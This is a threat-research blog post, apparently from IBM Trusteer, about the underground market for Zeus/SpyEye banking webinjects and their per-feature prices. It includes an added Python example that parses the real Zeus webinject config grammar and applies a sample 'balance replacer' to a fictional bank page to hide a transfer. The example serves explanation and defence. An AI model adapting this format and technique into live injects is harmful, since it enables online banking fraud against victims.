IBM Trusteer researchers have long been writing about the evolving underground market for webinjects.

Our team recently discovered a new development: Criminals are now selling customized webinjects that are priced per feature. For example, one seller offers a webinject for Zeus/SpyEye that contains the automatic transfer system (ATS) that was reported by Trend Micro researchers.

Webinject Sales

In our earlier posts, we discussed the various approaches criminals have taken to sell webinjects. Initially, they used malware-based pricing, a model in which webinjects are developed for specific malware platforms such as Zeus and SpyEye and are priced per platform. Certain platforms commanded a higher price for webinjects.

This pricing system was followed by bulk pricing, where criminals offered discounts for large orders, as well as geography-based pricing, where webinject costs were determined by the geographic location of the target they were designed to attack. Next in line came production cost pricing, where sellers offered cheaper, premade webinjects and charged a premium for custom-made webinjects.

How Much Do These Cost?

The new pricing strategy we discovered for webinjects is based on the specific features requested and the user information they are designed to steal. In one advertisement we came across, the criminal offers to develop webinjects for any malware platform (e.g., SpyEye, Zeus and Ice IX) and target specified by the buyer. The following is the price list for individual webinject features that can be purchased:

  • Balance Grabber: Captures the victim’s balance information and sends it to the fraudster’s command and control server. Price: $50-$100.
  • Balance Replacer: Updates the “actual” balance in an online banking application’s balance page to hide the fraudulent transaction amount. This prevents the victim from realizing that fraud has taken place until he or she receives a paper statement, goes to an ATM or checks his or her balance via phone banking. Price: $200-$300.
  • TAN Grabber: Captures one-time passwords that are used by some banks to authorize online banking transactions. Price: $150-$200.
  • Additional Passwords: Requests additional passwords from the victim. Price: $100-$200.
  • Alerting: Sends various notifications to the malware’s administration panel and to a Jabber instant messenger client in real time. Price: $100-$200.
  • AZ (dubbed “Avtozaliv”): This capability, also known as ATS, provides all the components needed to conduct automated and unattended online banking fraud; specifically, it can bypass two-factor authentication, initiate a transfer and update the account balance to hide the fraud. Price: $1,500-$2,000.
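Every feature in the list above is delivered the same way: a text config block that tells the malware's browser hook where in the bank's HTML to splice its own content. The following Python is an added example written for this post (it is not code from the article, from IBM Trusteer or from any malware author). It parses the Zeus-family webinject grammar (set_url, data_before, data_inject, data_after, each data block closed by data_end) and applies a config to a page the way the hook would, so you can see exactly what a "balance replacer" changes. The bank URL, the page HTML, the 500.00 transfer and the injected figure are all constructed for illustration.

```python
"""Parse a Zeus/SpyEye-style webinject config and apply it to a page.

Added example for this article, not code from the original post or from
any malware family. The four-keyword grammar (set_url, data_before,
data_inject, data_after, each data block closed by data_end) is the one
used by Zeus-family webinject configs; the bank URL, the page HTML and
the injected balance below are constructed for illustration only.
"""
import fnmatch
import re
from dataclasses import dataclass


@dataclass
class WebInject:
    url_mask: str        # wildcard mask from the set_url line
    flags: str = ""      # Zeus flags: G = apply on GET, P = apply on POST
    before: str = ""     # HTML that must precede the insertion point
    inject: str = ""     # HTML/JS to insert at that point
    after: str = ""      # if set, everything up to this HTML is replaced


def parse_webinjects(config: str) -> list[WebInject]:
    """Turn the text config into WebInject records, one per set_url."""
    injects: list[WebInject] = []
    current = None       # record the data blocks belong to
    block = None         # "before", "inject" or "after" while inside a block
    buf: list[str] = []
    for line in config.splitlines():
        word = line.strip()
        if word.startswith("set_url"):
            parts = word.split()
            if len(parts) < 2:
                raise ValueError(f"malformed line: {line!r}")
            current = WebInject(url_mask=parts[1],
                                flags=parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif word in ("data_before", "data_inject", "data_after"):
            block, buf = word[len("data_"):], []
        elif word == "data_end":
            if current is None or block is None:
                raise ValueError("data_end outside a block")
            setattr(current, block, "\n".join(buf).strip())
            block = None
        elif block is not None:
            buf.append(line)
    return injects


def matching_injects(injects, url, method="GET"):
    """Select injects whose URL mask matches and whose flags allow the method."""
    flag = "G" if method.upper() == "GET" else "P"
    return [wi for wi in injects
            if fnmatch.fnmatchcase(url, wi.url_mask)
            and (not wi.flags or flag in wi.flags)]


def _mask_to_regex(mask: str) -> str:
    """'*' inside a data block matches any run of characters, shortest first."""
    return ".*?".join(re.escape(part) for part in mask.split("*"))


def apply_webinject(html: str, wi: WebInject) -> str:
    """Rewrite html the way the browser hook would: insert data_inject after
    the data_before match, replacing everything up to data_after if given."""
    if not wi.before:
        raise ValueError("data_before is required")
    if wi.after:
        pattern = re.compile("(" + _mask_to_regex(wi.before) + ").*?("
                             + _mask_to_regex(wi.after) + ")", re.DOTALL)
        return pattern.sub(lambda m: m.group(1) + wi.inject + m.group(2),
                           html, count=1)
    pattern = re.compile("(" + _mask_to_regex(wi.before) + ")", re.DOTALL)
    return pattern.sub(lambda m: m.group(1) + wi.inject, html, count=1)


def render(url: str, method: str, html: str, injects) -> str:
    """Apply every matching inject, in config order, to the server's HTML."""
    for wi in matching_injects(injects, url, method):
        html = apply_webinject(html, wi)
    return html


# Constructed config: a static "balance replacer" for the overview page.
# A real one computes the pre-fraud figure in injected JavaScript; the
# fixed string is enough to show where the rewrite lands.
SAMPLE_CONFIG = """
set_url https://bank.example/accounts/overview* GP
data_before
<td class="balance">
data_end
data_inject
1,248.17
data_end
data_after
</td>
data_end
"""

# Constructed page as the bank served it after a 500.00 transfer.
SAMPLE_PAGE = ('<html><body><table><tr><th>Balance</th>'
               '<td class="balance">748.17</td></tr></table></body></html>')


if __name__ == "__main__":
    injects = parse_webinjects(SAMPLE_CONFIG)
    print(render("https://bank.example/accounts/overview?acct=1", "GET",
                 SAMPLE_PAGE, injects))
```

Run it and the served balance of 748.17 comes out as 1,248.17 while every other byte of the page is untouched, which is why the victim sees nothing until a statement or ATM shows the real figure. The same three blocks with a different data_before/data_after pair give a TAN grabber or an extra-password form; the price list is charging for the payload, not for any difference in mechanism.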

Webinjects’ Growing Reach

The advertisement also included videos that demonstrate webinjects developed to attack Italian, Spanish and German banks. This latest development in webinject marketing illustrates how the underground marketplace is following traditional software industry pricing schemes by offering à la carte and complete “suite” pricing options.

Unfortunately, buying high-quality webinjects is getting easier and more affordable, which opens the door for more criminals to get into the business of online banking fraud. Criminals are no longer bound by rigid malware configurations designed to conduct specific attacks at specific institutions. They can now specify the precise attack and target institution that they believe will maximize their chances of successfully committing fraud. And the more combinations of attack types and targets they can try, the more likely it is that some of them will succeed.
